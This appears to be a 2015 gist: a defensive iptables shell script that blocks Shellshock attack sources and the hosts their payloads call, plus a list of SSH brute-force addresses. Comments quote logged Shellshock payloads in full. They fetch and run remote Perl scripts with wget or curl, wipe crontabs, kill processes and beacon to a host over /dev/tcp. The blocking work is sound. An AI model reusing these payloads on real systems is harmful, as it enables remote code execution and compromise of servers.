
@donnykurnia
Last active August 29, 2015 14:16
iptables block list 2015-03-08
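# shellshock exploit
#
# Each entry keeps the access-log line that triggered it, then blocks the
# requesting address inbound and, where the payload names one, the host it
# tried to reach outbound.
#
# Blocking addresses is only containment: the fix for these requests is a
# patched bash. The logged status codes (301, 400) suggest the requests were
# redirected or rejected rather than handed to a CGI script, but the log alone
# does not prove that. Check /tmp and /var/tmp for the file names seen in the
# payloads below, and check the crontab (one payload runs "crontab -r").

# Drop inbound traffic from source address $1.
# Skips the insert when the same rule is already present, so re-running the
# list does not stack duplicate rules.
block_source() {
  # -C only tests for the rule; its "no such rule" error is expected, so hide it.
  if ! iptables -C INPUT -s "$1" -j DROP 2>/dev/null; then
    iptables -I INPUT -s "$1" -j DROP ||
      printf 'could not block source %s\n' "$1" >&2
  fi
}

# Drop outbound traffic to destination address $1.
# Inserted at the top of OUTPUT (the original appended with -A): an appended
# DROP is never reached if an earlier OUTPUT rule already accepts the packet.
block_destination() {
  if ! iptables -C OUTPUT -d "$1" -j DROP 2>/dev/null; then
    iptables -I OUTPUT -d "$1" -j DROP ||
      printf 'could not block destination %s\n' "$1" >&2
  fi
}

# 209.236.133.201 - - [02/Mar/2015:15:50:03 +0700] "GET /cgi-bin/sip.cgi HTTP/1.0" 301 178 "-" "() { :;}; /bin/bash -c \x22cd /var/tmp ; wget http://151.236.44.210/ft.exe ; curl -O http://151.236.44.210/ft.exe;perl ft.exe;perl /var/tmp/ft.exe;perl ft.exe\x22"
block_source 209.236.133.201
block_destination 151.236.44.210
# 31.184.194.114 - - [04/Mar/2015:10:29:53 +0700] "GET /fcgi-php/php HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\x22);'"
block_source 31.184.194.114
block_destination 64.32.12.152
# 50.22.0.250 - - [25/Feb/2015:21:45:24 +0000] "GET HTTP/1.1 HTTP/1.1" 400 418 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://87.106.130.7/ou.pl -O /tmp/b.pl;curl -O /tmp/b.pl http://87.106.130.7/ou.pl;perl /tmp/b.pl;rm -rf /tmp/b.pl*\");'"
block_source 50.22.0.250
block_destination 87.106.130.7
# 68.116.30.102 - - [27/Feb/2015:08:11:45 +0700] "GET /cgi-bin/test-cgi HTTP/1.1" 301 178 "() { :;}; /bin/bash -c \x22echo KABINETKITA.ORG/cgi-bin/test-cgi > /dev/tcp/23.227.199.185/80; echo KABINETKITA.ORG/cgi-bin/test-cgi > /dev/udp/23.227.199.185/80\x22" "() { :;}; /bin/bash -c \x22echo KABINETKITA.ORG/cgi-bin/test-cgi > /dev/tcp/23.227.199.185/80; echo KABINETKITA.ORG/cgi-bin/test-cgi > /dev/udp/23.227.199.185/80\x22"
block_source 68.116.30.102
block_destination 23.227.199.185
# 186.211.96.170 - - [23/Feb/2015:22:25:23 +0700] "GET / HTTP/1.1" 301 178 "() { :;}; /bin/bash -c \x22wget -O /tmp/bbb www.redel.net.br/1.php?id=3130342e3135332e3230392e3234\x22" "() { :;}; /bin/bash -c \x22wget -O /tmp/bbb www.redel.net.br/1.php?id=3130342e3135332e3230392e3234\x22"
# 216.245.134.238 - - [26/Feb/2015:18:33:15 +0700] "GET / HTTP/1.0" 301 101 "() { :;}; /bin/bash -c \x22wget -O /tmp/bbb www.redel.net.br/1.php?id=3132382e3139392e3131362e3533\x22" "() { :;}; /bin/bash -c \x22wget -O /tmp/bbb www.redel.net.br/1.php?id=3132382e3139392e3131362e3533\x22"
# NOTE(review): these two payloads fetch from www.redel.net.br, which has no
# outbound block here. iptables resolves a host name only once, when the rule
# is added, so resolve and review the address before adding an OUTPUT rule.
block_source 186.211.96.170
block_source 216.245.134.238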
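# ssh attacker
#
# Source addresses and /24 ranges dropped after SSH login attempts.
# A static list like this goes stale quickly; treat it as a stop-gap next to
# key-only SSH authentication and automated banning. Before applying, confirm
# that none of the /24 ranges covers an address you administer the host from.
# The rules are IPv4 only (iptables); ip6tables is not touched.
while IFS= read -r src; do
  [ -n "$src" ] || continue
  # -C only tests for the rule; its "no such rule" error is expected, so hide
  # it. Skipping existing rules keeps repeated runs from stacking duplicates.
  if ! iptables -C INPUT -s "$src" -j DROP 2>/dev/null; then
    iptables -I INPUT -s "$src" -j DROP ||
      printf 'could not block source %s\n' "$src" >&2
  fi
done <<'EOF'
14.63.161.216
49.213.16.131
49.236.204.180
54.235.163.229
58.42.252.116
58.64.3.29
58.145.168.162
61.160.215.102
61.160.247.14
62.210.141.204
64.150.187.95
65.207.23.201
82.165.151.97
82.194.76.182
87.106.151.126
88.156.77.176
91.240.163.39
95.70.201.28
95.77.16.45
103.41.124.0/24
104.130.166.23
104.167.104.147
104.207.144.209
107.182.140.36
108.229.25.10
109.166.212.230
109.169.74.58
111.74.239.39
112.217.177.82
112.220.204.42
113.195.145.0/24
115.230.126.151
115.231.218.130
115.231.218.131
115.231.222.45
115.231.222.176
115.239.228.0/24
121.61.19.0/24
151.249.136.71
173.193.162.83
182.100.67.113
182.100.67.115
183.136.216.0/24
198.12.149.20
198.199.70.171
200.29.21.26
200.106.151.126
200.222.72.170
202.121.199.171
202.123.179.226
218.28.103.231
218.87.111.108
218.87.111.110
218.106.254.121
221.203.3.0/24
221.224.10.50
221.226.106.188
222.101.130.145
222.186.50.164
222.186.56.40
222.186.56.41
222.186.58.70
222.186.197.76
EOF

# Persist the running rule set. Report a failure instead of ending silently:
# without a successful save the blocks above are gone after the next reboot.
service iptables-persistent save ||
  printf 'iptables-persistent save failed; rules will not survive a reboot\n' >&2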